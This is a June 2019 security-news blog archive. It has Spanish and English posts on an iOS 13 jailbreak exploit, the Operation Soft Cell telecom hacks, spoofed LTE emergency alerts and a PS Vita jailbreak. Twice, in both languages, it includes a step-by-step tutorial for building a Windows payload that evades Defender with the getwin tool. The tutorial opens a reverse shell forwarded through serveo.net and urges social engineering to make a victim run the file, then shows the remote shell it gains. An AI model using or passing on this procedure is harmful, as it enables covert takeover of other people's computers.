Month: June 2019

Ransomware attack in Florida and IBM, TCS and HP affected by Cloud Hopper campaign

Posted on

Advertisements

PUBLICAN NUEVO JAILBREAK DE IOS13 CON EXPLOIT TFP0

Posted on

CONTENIDO ORIGINAL: https://noticiasseguridad.com/vulnerabilidades/publican-nuevo-jailbreak-de-ios13-con-exploit-tfp0/

Especialistas en seguridad de aplicaciones web siguen buscando un método de jailbreakpara explotar posibles vulnerabilidades presentes en los sistemas operativos iOS. Recientemente, el experto Luca Todesco lanzó un exploit tfp0 para iOS 13 beta 2 que abre enormes posibilidades para la comunidad jailbreaker.

Aunque no se cuenta con certeza sobre la etapa de desarrollo actual de este proyecto, Todesco ha publicado algunos detalles sobre los avances en su proyecto de jailbreak.

Los especialistas en seguridad de aplicaciones web mencionan que tfp0 es un puerto de tareas del kernel. El éxito del jailbreak dependería de esta implementación, pues los desarrolladores pueden escribir en la memoria del kernel de las plataformas.

Después de las pruebas es posible que Todesco no publique más detalles sobre el exploit tfp0. Además, la fecha de lanzamiento del jailbreak aún se ve muy lejana, pues el sistema operativo iOS 13 aún se encuentra en etapa de desarrollo y sus compilaciones siguen siendo inestables.

Hace un par de meses el hacker conocido como @iBSparkes en Twitter, publicó un video mostrando la existencia de una vulnerabilidad día cero en la versión beta 1 del sistema iOS 13 de Apple. Esta versión beta apenas había sido lanzada por Apple un día antes de que el video fuera publicado, al terminar la conferencia de inicio del WWDC 2019; en otras palabras, el hacker tardó sólo doce horas en hallar la falla.

Después de mostrar un dispositivo ejecutando la beta de iOS 13, el hacker lanzó una aplicación desconocida desde la segunda pantalla del inicio, que posiblemente contenía el código de prueba de concepto de la vulnerabilidad; inmediatamente después de lanzar esta aplicación, el dispositivo colapsó.

Acorde a los especialistas en seguridad de aplicaciones web del Instituto Internacional de Seguridad Cibernética (IICS) el jailbreak de iOS 13 podría estar disponible antes del lanzamiento de la versión final del firmware, en septiembre de este año. Si desea actualizar a iOS 13 beta 2 con la esperanza de que se lance un posible jailbreak, le recomendamos que se mantenga en su configuración actual de iOS 12 – 12.1.2. No actualice a la última compilación ya que Apple ha dejado de firmar iOS 12.3.

HACKEAN MÚLTIPLES COMPAÑÍAS DE TELECOMUNICACIONES; DATOS DE LLAMADAS Y UBICACIÓN DE LOS USUARIOS FUERON ROBADOS

Posted on

CONTENIDO ORIGINAL: https://noticiasseguridad.com/hacking-incidentes/hackean-multiples-companias-de-telecomunicaciones-datos-de-llamadas-y-ubicacion-de-los-usuarios-fueron-robados/

Acorde a especialistas en seguridad en redes, un grupo de hackers se ha infiltrado en los sistemas de al menos una docena de operadores de telefonía móvil de todo el mundo y cuentan con la capacidad de controlar las redes sin que las compañías puedan intervenir.

Según los reportes, los cibercriminales han estado explotando este acceso para robar información confidencial al menos durante los últimos siete años, aunque, acorde a la firma de ciberseguridad Cyberseason, podrían llevar a cabo actividades más peligrosas, como interrumpir las comunicaciones de las compañías comprometidas.

Esta campaña de hacking, idenitificada como Operación Soft Cell, se dirige a los proveedores de servicios de telefonía en Europa, Asia, África y Oriente Medio. Acorde a los especialistas en seguridad en redes, los hackers comenzaron a infectar a múltiples compañías desde 2012, obteniendo control de sus redes y robando una enorme cantidad de datos personales.

Oficiales del Departamento de Seguridad Nacional (NHS) de E.U. consideran que los ciberataques contra esta clase de infraestructura un tema de seguridad nacional, incluso han creado su propio centro para combatir esta clase de ataques pues, si un grupo de hackers lograra hacer colapsar las redes telefónicas podrían provocar una interrupción masiva, no obstante, los expertos creen que el principal interés de los actores de amenazas es el espionaje, no la disrupción de servicios.

Los especialistas en seguridad en redes descubrieron que los atacantes cuentan con acceso a las redes de más de doce compañías de telefonía móvil explotando vulnerabilidades conocidas, usando malware escondido en archivos de Word o explotando servidores expuestos. Después de acceder a las compañías, los hackers despliegan malware  a través de todas las computadoras en una red y tratan de acceder con ataques de fuerza bruta.

Basándose en el método de ataque, los especialistas de la firma de ciberseguridad creen que los hackers cuentan con el respaldo financiero de algún gobierno, posiblemente China. El malware detectado en los ataques, el método, además de la ubicación de los servidores atacantes, están vinculados al grupo de hacking chino conocido como APT10.

Los especialistas del Instituto Internacional de Seguridad Cibernética (IICS) afirman que todas las compañías involucradas ya han recibido una alerta de seguridad, aunque aún se desconocen las medidas de mitigación que las compañías afectadas implementarán.

CÓMO CREAR CARGAS ÚTILES COMPLETAMENTE INDETECTABLES PARA WINDOWS 10

Posted on

CONTENIDO ORIGINAL: https://noticiasseguridad.com/tutoriales/como-crear-cargas-utiles-completamente-indetectables-para-windows-10/

Los hackers aman el shell de Windows. Existen múltiples cargas útiles para evadir el mecanismo de seguridad de este sistema operativo y, acorde a especialistas en hacking éticodel Instituto Internacional de Seguridad Cibernética (IICS), estas cargas están bien codificadas para obtener las sesiones de Windows. Hay diversos métodos para obtener el reverse shell, hoy analizaremos getwin, empleada para crear la carga útil y el listener de Win32.

Nota: La carga útil generada por esta herramienta es totalmente indetectable (FUD) para la herramienta Windows 10 Defender. No analice la carga útil generada con la herramienta virustotal.com

La herramienta no necesita ninguna configuración, no es necesario configurar el reenvío de puertos o instalar otros programas. Vea la demostración en el siguiente video:

  • Para propósitos de prueba, en el lado del atacante usaremos Kali Linux 2018.4 amd64 y en el lado de la víctima usaremos Windows 10 1809
  • Abra el terminal y escriba git clone https://github.com/thelinuxchoice/getwin.git
  • Luego escriba cd getwin y escriba chmod u + x getwin.sh
root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/thelinuxchoice/getwin.git
 Cloning into 'getwin'…
 remote: Enumerating objects: 46, done.
 remote: Total 46 (delta 0), reused 0 (delta 0), pack-reused 46
 Unpacking objects: 100% (46/46), done.
 root@kali:/home/iicybersecurity/Downloads# cd getwin/
 root@kali:/home/iicybersecurity/Downloads/getwin# chmod u+x getwin.sh
 root@kali:/home/iicybersecurity/Downloads/getwin# ls
 getwin.sh  icon  LICENSE  README.md
  • Escriba ./getwin.sh
root@kali:/home/iicybersecurity/Downloads/getwin# ./getwin.sh
     _______                _  _  _  _
    (_______)          _   (_)(_)(_)(_)
     _   ___  _____  _| |_  _  _  _  _  ____
    | | (_  || ___ |(_   _)| || || || ||  _ \
    | |___) || ____|  | |_ | || || || || | | |
     \_____/ |_____)   \__) \_____/ |_||_| |_|v1.2

.:.: FUD win32 payload generator and listener :.:.
        .:.: Coded by:@linux_choice :.:.

     :: Warning: Attacking targets without  ::
     :: prior mutual consent is illegal!    ::
  • Una vez que la herramienta haya comenzado, presione enter para establecer el puerto predeterminado. Luego ingrese el nombre de la carga útil (test01) y seleccione el icono
 [*] Choose a Port (Default: 4098 ):
 [*] Payload name (Default: payload ): test01
 [] Put ICON path (Default: icon/messenger.ico ): [] Compiling…
 [] Saved: test01.exe [!] Please, don't upload to virustotal.com ! [] Starting server…
 [*] Send the first link above to target + /test01.exe:
 Forwarding HTTP traffic from https://ludius.serveo.net
 Forwarding TCP connections from serveo.net:2119
 [*] Waiting connection…
 listening on [any] 1547 …
  • Como puede ver, la conexión del listener ha comenzado. Ahora puede utilizar cualquier variante de ingeniería social para ejecutar la carga útil en la computadora de la víctima
  • Para las pruebas usaremos Windows 10 1809 con Windows Defender habilitado
    • Así que ahora vamos a ejecutar la carga útil en un sistema operativo Windows 10
    • Después de crear la carga útil (test01.exe), ejecute la carga útil (test01.exe). Simplemente haga doble clic en el ejecutable
    • Al hacer doble clic en la carga útil (test01.exe) se creará una sesión entre la víctima y la máquina objetivo y obtendrá el shell de Windows
    • Herramientas como esta son parte de los cursos de hacking ético ofrecidos por el Instituto Internacional de Seguridad Cibernética (IICS)

    No suba la carga útil generada a virustotal.com

    [*] Waiting connection…
     listening on [any] 4342 …
     connect to [127.0.0.1] from localhost [127.0.0.1] 43878
     TCP connection from 27.4.174.190 on port 3352
     Microsoft Windows [Version 10.0.17758.1]
     (c) 2018 Microsoft Corporation. All rights reserved.
     E:>C:
     C:
     C:>ipconfig
     ipconfig
     Windows IP Configuration
     Ethernet adapter Ethernet0:
     Connection-specific DNS Suffix  . :
        Link-local IPv6 Address . . . . . : fe80::c947:1c34:3f73:be30%13
        IPv4 Address. . . . . . . . . . . : 192.168.1.5
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : fe80::1%13
                                            192.168.1.1
    C:>getmac
     getmac
     Physical Address    Transport Name
     =================== ==========================================================
     ##-##-##-E8-##-##   \Device\Tcpip_{F237F6ED-8EC9-42C1-93F8-E95EDB31D7FC}
    
    (For security reasons we have hide the MAC address)
    • Ahora el atacante puede cambiar o ver cualquier archivo de la computadora objetivo con Windows 10

LANZAN ALERTAS FALSAS USANDO VULNERABILIDADES EN LTE

Posted on

CONTENIDO ORIGINAL: https://noticiasseguridad.com/vulnerabilidades/lanzan-alertas-falsas-usando-vulnerabilidades-en-lte/

Un grupo de especialistas en auditorías de sistemas se las arregló para engañar al sistema de alerta presidencial enviando un falso mensaje imposible de ser bloqueado a los teléfonos de los asistentes a un estadio de fútbol con capacidad para 50 mil personas.

El equipo, compuesto por investigadores de la Universidad de Colorado Boulder, encontró la forma de falsificar la alerta y enviarla usando radio definida por software, que está al alcance de cualquier usuario; además, los expertos realizaron algunas modificaciones a las bibliotecas de código abierto NextEPC y srsLTE. El experimento mostró una tasa de efectividad del 90%.

Acorde a especialistas en auditorías de sistemas, la Alerta Inalámbrica de Emergencia (WEA) es operada por la Agencia Federal de Manejo de Emergencias de E.U. y tiene como propósito garantizar una comunicación rápida y efectiva entre el presiente y los ciudadanos en caso de emergencia. Estas alertas presidenciales no pueden ser desactivadas o bloqueadas, en otras palabras, no importa si el peligro es real o es una falsa alarma, los teléfonos siempre recibirán estas alertas.

En su investigación, los especialistas mencionan que usaron estaciones base portátiles para imitar la señal LTE enviada por las torres de telefonía móvil. Las pruebas fueron realizadas en el Folsom Field de la Universidad de Colorado, con capacidad para 50 mil personas; aunque las alertas no llegaron a todo ese público, los expertos descubrieron que eran capaces de enviar estos mensajes tanto a usuarios de Android como de iOS.

“Usando cuatro estaciones base portátiles de solamente un watt de potencia pudimos enviar el mensaje a casi todos los espectadores en el estadio con una tasa de éxito de poco más del 90%”, explicaron los investigadores.

Acorde a los expertos en auditorías de sistemas del Instituto Internacional de Seguridad Cibernética (IICS) los actores de amenazas podrían emplear un ataque similar para engañar a decenas de miles de personas con mensajes falsos anunciando supuestos ataques terroristas hasta desastres naturales.

Los investigadores consideran que han descubierto una vulnerabilidad masiva en la red de telefonía móvil de E.U. y, aunque afirman que el problema se puede corregir, ninguna de las posibles soluciones será fácil de implementar.

NUEVO JAILBREAK DE PS VITA; CÓMO USAR EL EXPLOIT TRINITY

Posted on

CONTENIDO ORIGINAL: https://noticiasseguridad.com/tecnologia/nuevo-jailbreak-de-ps-vita-como-usar-el-exploit-trinity/

Especialistas en análisis de vulnerabilidades reportan la aparición de un exploit par la consola PS Vta  de Sony con el que los usuarios pueden desbloquear el dispositivo para ejecutar juegos, aplicaciones, emuladores, entre otras funciones más. Lanzada en 2012, PS Vita es una consola portátil con pantalla de 5 pulgadas, procesador de cuatro núcleos y que incluye soporte para cientos de juegos, incluyendo títulos de consolas anteriores, como PSP y PSOne.

El exploit Trinity fue lanzado por primera vez en mayo pasado, pero los desarrolladores acaban de lanzar una nueva versión junto con una explicación paso a paso para explotar una vulnerabilidad presente en la consola PS Vita. Trinity es compatible con la más reciente versión del firmware de la consola.

En realidad esta es la tercera versión del exploit que se publica, mencionan los expertos en análisis de vulnerabilidades. Aunque desde su lanzamiento hay usuarios buscando la forma de acceder al software de la consola, Sony había lanzado actualizaciones de firmware que inhabilitaban las herramientas empleadas por los hackers para desbloquear el PS Vita.

No obstante, esto cambió a principios de este año, pues Sony decidió descontinuar la producción de hardware de PS Vita a principios de este año, y los expertos consideran muy poco probable que la compañía siga lanzando actualizaciones de software para este dispositivo. En otras palabras, se puede hacer jailbreak a las versiones de firmware de PS Vita 3.69 y 3.60 y usar la consola liberada de manera indefinida.

Por otra parte, la decisión de la compañía también podría impactar la funcionalidad de este exploit. Como los desarrolladores comentan, una parte fundamental para desbloquear un PS Vita usando Trinity es la descarga de un juego de PSP o un demo desde PlayStation Store para instalar un emulador en el PS Vita, pues la explotación requiere un emulador de PSP, que podría dejar de estar disponible en el futuro cercano.

Acorde a los especialistas en análisis de vulnerabilidades del Instituto Internacional de Seguridad Cibernética (IICS), el hacker que descubrió la vulnerabilidad en PS Vita que explota Trinity decidió no hacer pública la falla hasta después de la decisión de Sony de dejar de dar soporte a la consola, esperando extender la vida útil de este exploit.

A pesar del poco éxito que tuvo en el mercado, aún es posible conseguir una consola PS Vita en algunas tiendas en línea.

CREATE WINDOWS 10 FUD (FULLY UNDETECTABLE) PAYLOAD

Posted on

ORIGINAL CONTENT: https://www.securitynewspaper.com/2019/06/20/create-windows-10-fud-fully-undetectable-payload/

Windows shell is what, every hacker loves. There are various Windows payloads are designed to bypass Windows OS security mechanism. According to ethical hacking researcher of international institute of cyber security these payloads are well coded to get sessions of Windows OS. There are many different ways of getting reverse shell. Today we will show getwin tool used to create Win32 payload and listener.

Payload generated by this tool is FUD (fully undetectable) by Windows 10 DefenderDo Not Upload the payload generated on virustotal.com.

The tool does not need any configuration, no need to configure port forwarding or install other programs. See the demonstration in below video.

  • For testing purposes, On attacker side we will use Kali Linux 2018.4 amd64 and on the Victim side we will use Windows 10 1809.
  • Open terminal type git clone https://github.com/thelinuxchoice/getwin.git
  • Then type cd getwin & type chmod u+x getwin.sh
root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/thelinuxchoice/getwin.git
 Cloning into 'getwin'…
 remote: Enumerating objects: 46, done.
 remote: Total 46 (delta 0), reused 0 (delta 0), pack-reused 46
 Unpacking objects: 100% (46/46), done.
 root@kali:/home/iicybersecurity/Downloads# cd getwin/
 root@kali:/home/iicybersecurity/Downloads/getwin# chmod u+x getwin.sh
 root@kali:/home/iicybersecurity/Downloads/getwin# ls
 getwin.sh  icon  LICENSE  README.md
  • Type ./getwin.sh
root@kali:/home/iicybersecurity/Downloads/getwin# ./getwin.sh
     _______                _  _  _  _
    (_______)          _   (_)(_)(_)(_)
     _   ___  _____  _| |_  _  _  _  _  ____
    | | (_  || ___ |(_   _)| || || || ||  _ \
    | |___) || ____|  | |_ | || || || || | | |
     \_____/ |_____)   \__) \_____/ |_||_| |_|v1.2

.:.: FUD win32 payload generator and listener :.:.
        .:.: Coded by:@linux_choice :.:.

     :: Warning: Attacking targets without  ::
     :: prior mutual consent is illegal!    ::
  • After the tool has started, press enter to set default port. Then enter payload name(test01) and select the icon.
 [*] Choose a Port (Default: 4098 ):
 [*] Payload name (Default: payload ): test01
 [] Put ICON path (Default: icon/messenger.ico ): [] Compiling…
 [] Saved: test01.exe [!] Please, don't upload to virustotal.com ! [] Starting server…
 [*] Send the first link above to target + /test01.exe:
 Forwarding HTTP traffic from https://ludius.serveo.net
 Forwarding TCP connections from serveo.net:2119
 [*] Waiting connection…
 listening on [any] 1547 …
  • As you can see listener connection has started. Now you can use any social engineering trick to execute the payload in victim computer.
  • For testing we will use Windows 10 1809 with Windows Defender enabled.
  • So now we will execute the payload in Windows 10 OS.
  • After creating the payload (test01.exe). Execute the payload (test01.exe). Simply double click the executable.
  • As you double click on the payload (test01.exe). A session will be created between victim and the target machine and you will get windows shell.
  • Tools like this are the part of ethical hacking courses offered by International Institute of Cyber Security

Do Not Upload the payload generated on virustotal.com

[*] Waiting connection…
 listening on [any] 4342 …
 connect to [127.0.0.1] from localhost [127.0.0.1] 43878
 TCP connection from 27.4.174.190 on port 3352
 Microsoft Windows [Version 10.0.17758.1]
 (c) 2018 Microsoft Corporation. All rights reserved.
 E:>C:
 C:
 C:>ipconfig
 ipconfig
 Windows IP Configuration
 Ethernet adapter Ethernet0:
 Connection-specific DNS Suffix  . :
    Link-local IPv6 Address . . . . . : fe80::c947:1c34:3f73:be30%13
    IPv4 Address. . . . . . . . . . . : 192.168.1.5
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : fe80::1%13
                                        192.168.1.1
C:>getmac
 getmac
 Physical Address    Transport Name
 =================== ==========================================================
 ##-##-##-E8-##-##   \Device\Tcpip_{F237F6ED-8EC9-42C1-93F8-E95EDB31D7FC}

(For security reasons we have hide the MAC address)
  • Now attacker can change or view any file of target’s Windows 10 computer.